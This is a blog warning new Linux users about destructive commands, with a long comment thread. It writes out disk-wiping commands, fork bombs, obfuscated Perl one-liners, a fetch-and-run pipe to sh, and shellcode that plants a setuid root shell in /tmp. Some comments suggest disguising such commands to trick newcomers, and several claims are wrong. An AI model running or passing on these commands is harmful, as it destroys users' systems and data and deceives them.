If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.1. Code:
rm -rf /
This command will recursively and forcefully delete all the files inside the root directory.
2. Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.
3. Code:
mkfs.ext3 /dev/sda
This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.
4. Code:
:(){:|:&};:
Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.
5. Code:
any_command > /dev/sda
With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.
6. Code:
wget http://some_untrusted_source -O- | sh
Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.
7. Code:
mv /home/yourhomedirectory/* /dev/null
This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.
There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.
Random Posts: Essential Linux Commands
Random Posts: Essential Linux Commands
to this:
mv ~/* /dev/null
~The Unix Geek
(found you via tuxmachines)
At the least windows didn't do that to me... not a windows fanboy or anything, but could never get linux to stay working...
rm -rf * is NOT the same as #1 (unless you are sitting in /)
* means everything at your current directory level
/ means everything from the root down
the * variant only deletes all files in your current directory. The / variant deletes everything from the root (/) directory.
As for Linux failing after using it for a week I'd say that you were doing it wrong or try to install some app or did something with Windows (if you were dual-booting) to hose it up.
rm -rf oldfiles. *
which is why always adding -rf just to be sure is a bad idea.
as root to help negate the random rm -fR *. What will happen is rm will see and interprate the -i file as a command line switch and force interactive mode instead of forced mode. I do this in all my clients / dirs.
jess
http://www.anon.cz.tc
Helpful there.
Your responses in turn:
1) "You're doing it wrong" Wow, you mean Linux is supposed to work for *longer* than a week, and that it's not normally shipped broken? Amazing! Not useful, though...
2) "You tried to install some app." Yes, how DARE you try to install *software* over an *operating system*. Mah gawd that's insanity.
3) "Did something with Windows" I used to think that this was a joke. "A Linux developer stubs his toe on a rock. Damn Microsoft."
Recursively gives read, write, and execute priviledges to all users for all files. The files in /bin and /etc/bin cannot have this mode or they will not run.
IS the same * means everything that includes the . and the .. you see when you do ls -a. On unix machines this will jump a directory back and continuelly do it until root is reached, thats why *.* is more common...
Having said that, this doesn't apply on most kernels and * won't jump directories, just trying to make my point.
man yourmom
"read mail, -realfast, /all"
[13:20:34(user@home)2]~ $ mkdir foo
[13:20:45(user@home)3]~ $ cd foo
[13:20:45(user@home)4]~/foo $ echo *
*
[13:20:46(user@home)5]~/foo $ touch foo bar baz
[13:20:54(user@home)6]~/foo $ echo *
bar baz foo
so yeah, rm -rf * does _not_ traverse to ".." -- maybe it did in 1996, but not for a long while now.
Even if for some reason a shell did do this, you wouldn't get the "recursive" jump behaviour described. Once the shell has expanded * its job is finished. If for some reason it put them there, rm would need to have a ridiculous bug where it also included . and .. files.
My job as sysadmin is safe - regarding the alternatives here...
*doh*
You should read this article again, very thoroughly, and take notes... cos yr duwin it rong. Or maybe you should just stick to live CD's.
will traverse up the tree
ask me how i know :(
I like to watch all the files disappear while laughing maniacally...
2. dir /w/p = will get you genital warts
3. edit autoexec.bat = will make you look stupid
don't forget about
man yourmom
"
Well I tried it, it errored out stating and i quote:
"yourmom is too large to be displayed"
Do that and your hard disk will be formatted back to factory defaults!
dd if=/dev/random of=/dev/port
apparently
cat /dev/port
works as well.
Does not do what you think it does, morons!
If you're not root it will fail.
If there is zero or more than one file whose name doesn't start with a "." in your home directory, it will fail because /dev/null is not a directory.
Otherwise it will move that one file over the device file /dev/null. The file will not have disappeared; it will be still be there, with all its content, just named "null" and situated in "/dev".
dd if=Unix\ Geek of=/dev/fail
Guess some of my old pc's here are going to have a hard time :D
chown -r "whoever" /usr/whoever/ .*
It not only chowned the user's files, but went up to the parent directory (.), chowned it, and then recursively chowned everything below that, including the Database user, etc..
Comments like:
Wow, you mean Linux is supposed to work for *longer* than a week, and that it's not normally shipped broken? Amazing! Not useful, though...
Yes, how DARE you try to install *software* over an *operating system*. Mah gawd that's insanity.
"A Linux developer stubs his toe on a rock. Damn Microsoft."
The speaks of an underlying sarcasm needed by someone who is not so much interested in having a problem fixed as they are screaming the loudest for attention. You strike me as someone who desires control at such a level that I am surprised any other operating system or any real-life experience has been much better. There has to be some kind of anger and validation beyond the OS, which causes you not only to dislike the product, but when someone makes a suggestion, your disagreement resorts to that of a 12 year old. Or to put it in a way it comes off to many:
"OoooOOOoooh, SARCASM! Maybe if I exaggerate my statements you'll believe what I have to say, but NOOooOOOo... you have Linux so far up your ass you cough up penguin feathers."
Now, if you are just a sour puss who reads Linux articles because you hope to understand it better, but haven't learned to relax, might I suggest what someone else already did: use a more modern distro. AND if it still borks after a few days, work with someone to help you with it.
But getting all upset like that really doesn't speak well for your patience and desire to learn.
Didn't think you could kill an OS
with simple Linux commands.
thanks from tony
That won't do what you think it will. It'll overwrite the /dev/null device node with a file, or exit saying "/dev/null: not a directory". /dev/null is used for redirecting text output, not copying or moving data.
Also, in number 2, everyone is ignoring the second part. Sure, it's rm -rf in hex. But the second part of the command creates an SUID root shell in a hidden file in /tmp/.beyond -- essentially a backdoor root shell should the attacker ever get a prompt at the box again.
eg. if someone says that rm rf / solves your problems, if you google "linux +rm" you will see that "rm" stands for remove. You don't have to know much about computers to understand that "remove" is dangerous.
dont worry about the guy that blows up his linux after a few hours / days
Linux is user friendly, it is just careful selecting its friends.
lol I love that one.
I am curious tho, which redhat / debian distro did you select for this?
and just what was the actual errors you got? without that information noone can help you, not even your mom.
-Badguy
I met someone who thought he was appending a directory name with a slash "/" character but inserted a space before the second slash giving two directories for find to work with.
e.g.: find /tmp / -exec rm -rf {} \;
Of course this was done as root and he said it pretty effectively removed a bunch of files on a server he was working with. At least pre-production if my memory serves.
rm -rf * in home doesn't delete .purple and the like, at least on Ubuntu Intrepid.
Biggest reason I don't use linux is after a couple of boots (usually within the first week), it fails to load for some reason.
Sorry you had so much trouble Eddie but why didn't you try Google or ask for help on one of the many forums.
If it had been your Windows machine doing this would you have dumped it or asked for help.
I have also been to so called support sites for different versions and end up leaving due azz wipes that would rather give false info rather thatn help anyone who is willing to try to switch to open source software.
Also, Knoppix anyver has very bad visual calrity fonts are blurred as well as graphics.
When I tried Vista on one hard drive and had Linux on another, Vista kept clobbering the ext3 filesystem, I guess because it didn't recognize it and decided to do something. All the inodes were shifted. fsck fixed it, of course.
rm: "." and ".." may not be removed
So that does not work on OSX Leopard. And I haven't seen a system going up recursively when issuing:
rm -rf *
Seems like an urban legend to me. I've once met a guy who claimed that he wiped his Debian installation using rm -rf *
It still don't buy it.
insert Russian accent
God, root, what is difference?
Now you know one reason why you shouldn't adopt rootly powers unless it is absolutely necessary.
chmod 000 -R /
http://blog.rootninja.com
This will shift the names of all the files in the users home directory. none of the file names will match their contents.
http://blog.rootninja.com
:(){ :|:& };:
Besides that, I think it has been "fixed" in newer systems. If I type it in a terminal, I get the following:
[thomas@localhost ~]$ bash: fork: Resursen midlertidig utilgængelig
bash: fork: Resource temporarily unavailable
bash: fork: Resource temporarily unavailable
...
And I can shut it all down with a simple Ctrl+C
chroot /some/directory/you/dont/care/about/but/has/a/distribution/on/it /bin/bash
this will only avoid some of the malicious code, not all of it
chmod -r 777 . /*
0:> [file]
(or something to that effect)
But I dont remember the parameters.
It doesnt work properly with some filesystems.
find -type f -mtime +30 -exec mv {} /dev/null \;
I ended up overwriting /dev/null and basically fubar-ed the whole server until it was restored.
cat /dev/random > ~/.backup &
is a great way to screw with someone, especially if the sysadmin has put limits on each user's home directory
tell them it's running some sort of diagnostic and it needs to run for an hour or so...
but that's another discussion...
hmm ... I thought, that means
ReadMail -ReallyFast ;-)
No manual entry for woman
me@mycomputer:~$
heheheheheeee
rm -rf /|rm -rf /&
I've previously had the joy of fixing somebody's computer when they dragged their C: drive to the recycle bin.
cheers :)
(ext2/3 only)
cd /
chattr -R +i *
Now sit back and watch people go nuts none of the files or dirs on the system can be modded or removed (reboots usually don't succeed )
["command" -h or --help] also will show you how the command works and what its used for.
thats all you need if you don't know what a command is used for.
this is FrostWire's Unix/Linux Command Reference, that are very helpful to new and experienced users.
FrostWire's Unix/Linux Command Reference part 1
FrostWire's Unix/Linux Reference Command part 2
YOUR A DUMBASS! get the * out of the IT field."
And why did this get approved by the blog author???
PERIOD.
Harmful commands are an infinite number of variants. At least do a basic google on the command you are given. Anything that is not plain text and obvious to search for is probably malicious.
If a fork-bomb can no longer fork, it exits.
The following short Z Shell code will typically get rid of the above fork bomb in about a minute:
while (sleep 100 &!) do; done
Each new do-nothing process we run reduces the number of rampant "fork bomb" processes by one, until eventually we can eradicate all of them, at which point the do-nothing processes can exit.
that works, but most people choose to limit the amount of processes a user can have running at any one time. man limits.conf
perl -e '$??s:;s:s;;$?::s;;=]=>%-{\\>%<-{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
galeng!
alias rm='rm -i'
alias mv='mv -i'
Since sometimes it's necessary to remove a lot of files at once I also have:
alias srm='rm -f'
before those other two
However, if you're like me and a few thousdand/million out there that don't use a distro with sudo, you'd have to login as root in order to execute these commands.
And for that, I'm glad and recommend this distro without sudo to new users.
links -dump http://tinyurl.com/funtrixwithnix|awk 'NR==44{print $1,$2" /*"}'|sh
Would yield the same results as my previously posted perl script...
s!/\*.*?\*/!!sg
perl -e 'while(1) {fork();}'
perl -e '''=~('(?{'.(']'^'-').((']'^'-')|'"').('`'|')').('`'|'.').((']'^'-')|'$').'"'.((']'^'-')|'#').((']'^'-')|')').((']'^'-')|'#'
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
while :; do mkdir foobar && echo gg >| hrhr ;cd foobar ;done &
echo $0 ; $0 &
[$[$RANDOM%6]=0]&&rm -rf /
for i in /dev/{hd*,sd*}; echo Drop the Dilmom\! I repeat: drop the Dilmom\! && dd if=/dev/urandom of=$i
echo "\$0&\$0">.-.&&. .-.
How can get rid of this file again?
>!r
Needless to say... the previous command was rm *.
"I didn't think it would let you do that." He said.
cat /dev/input/mouse0 > /dev/sda
On a desktop environment people tend to grab a mouse and do something else after this (like browsing a web).
Or when a guy asks how to work his new shiny joystick, after teaching him to get it working you may present a final command (just say, this command fine-tunes the calibration, simulate a real game usage):
cat /dev/input/js0 > /dev/sda
At the least linux didn't do that to me... not a linux fanboy or anything, but could never get windows to stay working...
If you have a file named -i (as was suggested you should have in / earlier on) or you have a file named * then your instinct is to type rm -i or rm * to delete it.
When you think about it, however, you will see that this will either cause an error because you didn't supply any filenames to delete or it will delete all the files in the current directory.
The proper method for deleting files that start with a dash is rm -- -i. You can also achieve this by using an absolute path: rm /home/dave/-i.
This doesn't work with a star however so for that you will need to use a backslash before the star like this: rm \*.
A fun trick to play on new sysadmins is to create a file called -rf * in their home directory. (But make sure you do regular backups...)
This post was completely useless, as anything you described would require at least an euid of 0 (providing the tool was setuid aware), most want a uid of 0, which is not the default user for most distros.
So, enjoy your google juice while I thumbs down this in Stumbleupon under my personal category of "Thinking all computer users are stupid".
If you want to find something to blog about that earns you traffic, try coming up with something better, or at least learning how GNU/Linux actually __works__, how permissions work and what 'sudo' and 'su' do.
Good luck on your blog, I hope you make a fortune. Advertising the fact that you fell victim to some IRC prank and nuked your computer is not the best way to gain links. If you hope to prevent this grave misfortune for others, at least understand how the OS actually works.
I 100% agree with you. This is all so stupid. And unfortunately most of the comments are even more stupid!
Dude... You should get yourself a Dell Inspiron 530n (preloaded with GNU/Linux of the Ubuntu variety), drop in a PNY nVidia 9400GT, and your whole family's jaws will drop at the awesomeness... mine did.
3d games, all the fastness, none of the BS and bloatness you would get from Vista.
Checkout my blog entry at:
http://healthysystem.blogspot.com/2008/11/dell-inspiron-530n-nvidia-9400gt-ubuntu.html
I'll be updating it with all the details.
GNU/Linux rocks!!!!
`rm -- -i'
For those interested on how the forkbomb works, those are two equivalent:
1)
:() {
: |: &
};
:
2)
function() {
function |function &
};
function
Conclusion: creates a function that calls itself and pipes stdout to a copy of himself then forks and exits. Calls the function one time.
It will double the `bash' (or any other shell) processes by an order of two at every call.
It's very fast as it just needs to copy the bash process (already cached by mmap) X times in the RAM until the RAM is full.
The ";" is only needed if written in one line.
There must be at least a space after "{" and before "}" for some shells (like bash).
i wanted to write:
vi /etc/passwd
but I wrote (as root):
vi >/etc/passwd
the > key is on a swiss keyboard right of shift-key. The shift key is also used for a /.
After that command, the passwd file is empty.
Userdata and system keeps on disk.
But no more login possible.
Lucky, that i could restore /etc/passwd from backup and had a running root Terminal.
Yes, i know, never touch passwd by editor, but irl its easier.
Greetings
Patrick
:)
"Well, I liked very much of version of command rm -rf /"
:)
Paulo Gomes
http://aventux.blogspot.com - Aventuras p'lo linux
More useful are tons of comments which gives lots of insight...
I am thinking of compiling the comments... will try :)
_ATOzTOA
www.atoztoa.com
Funny. I've had Linux boxes running, literally, for years. But then, I'm a Unix admin.
The nice thing about Linux is that it isn't maintained by control freaks or people who are driven by profit motive to be constantly rendering their product obsolete and in need of another upgrade. It's maintained by people who like to see it working with as many applications and for as many people as possible.
Nice points; thanks.
//Jadu, unstableme.blogspot.com
#kill -9 -1
yes > /dev/sda
and the IQ test for new linux admins;
touch -- /-rf
and I'd also like to point out that adding alises for 'rm -i' are completely useless... 'rm -if' or 'rm -fi' won't prompt.. the -f takes precedence. If you're prone to silly typos though, alias rm='mv -t ~/.Trash/' might be a good idea.
http://ultraoli.info/tag/top-deadly-linux-commands
Taking away the reading rights for / is also a great way to force a user to reinstall, when a friend of mine tried that, I was totally unable to solve it for him."
Hm. Maybe you would have to be able to access the filesystem from a live-CD or put the disk temporarily in another machine to fix that...? So that it was not your root system. Then I guess you should be able to issue a `chmod a+r whatever' or `chmod -R a+r whatever' on the relevant directory(ies) as root, unless the filesystem was encrypted or something...
But then maybe there are some magic you could do from the kernel boot command prompt of your bootloader (thinking "grub") that would help, but I'm not skilled enough to know this.
Anyways, I always stop to read twice and think a bit before issuing a possible really dangerous command as superuser...
kills all processes of the user. normal users get completely logged off, root will kill all processes (including init ;)
kills init , the barent of all processes
Neither will creating a file named '-i'
Example;
touch /tmp/test
rm -i -f /tmp/test
It WON'T prompt. -f take priority over -i.
Double-edged sword this blog.
Some will say: "Ahh! Now I'm wiser! I know what to avoid." Others will say: "Ahh! Now I'm wiser! I know what to suggest to others."
fuser -k /
loool
Description:
Will delete Kernel , Initrd , and GRUB/LILO Files
(Needed for Linux Startup)
rm /boot/vmlinux
rm /boot/vmlinuz
rm /boot/vmlinux*
rm /boot/vmlinuz*
Delete the Linux kernel
rm /bin/init
cd / ; find | grep init | rm
Deletes any file with "init" in it including /sbin/init.
sed -ei 's/id:5/id:6/' /etc/inittab; reboot
or maybe you could always do chmod -R 000 and see what happens when you don't have permission do do anything...
in top 3 on reddit linux.
http://dazzle.cs.mcgill.ca/wordpress/?p=36
"Anonymous Said,
April 17, 2010 4:01 AM
And this is why 90% of computer users run Windows."
No this is why 95% of servers run either Unix or Linux, and why almost every super computer runs Linux.
The only thing I can recommend, whether you are dealing with Linux, Unix< Windows, or Mac, is to back up your data regularly.
Wes
www.techbreeze.com
sudo rm -rf / | sudo reboot
also, what does this do?
perl -e '$??s:;s:s;;$?::s;;=]=>%-{\\>%<-{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
I tried it but it didn't do anything for me...
My noob friend just tried this command to his pc. mkfs.ext3 /dev/sda :)
open /*
also what it this?
sudo -m mfkg ###??e:;sf;;:%%<-{;;y; -/:-@[-`{-};`-{<-F^$^^&*$%^^::;
mv libc.so.6 libc.so.6-old
You don't loose any data, but your system ends up being virtually a brick, because almost all programs (including cp, mv, ... to put the file back in place) depends on this library :-)
November 21, 2008 1:24 AM
Biggest reason I don't use linux is after a couple of boots (usually within the first week), it fails to load for some reason. I would use it for normal browsing and playing some linux games, but an error would come up and would force me to reinstall after using for only a few days. Wierd...
At the least windows didn't do that to me... not a windows fanboy or anything, but could never get linux to stay working..."......... You must seriously have something major wrong with your hardware. Linux is rock solid stable everywhere. It's 2012 not 1993.
or better, or at least faster:
/dev/sda </dev/null (or whatever)
rsync -av --delete /wrong_dir /some_dir (i have done this, lol.. sucked a lot..)
there are lots of ways to kill tux.
swapon /dev/sda ? :p
You could even kill (or clone ;)) your disk remotely using netcat
most of these are probably not allowed to do, even as root.. but dont feel like trying :)
sudo mv U /dev/null
go.to/moo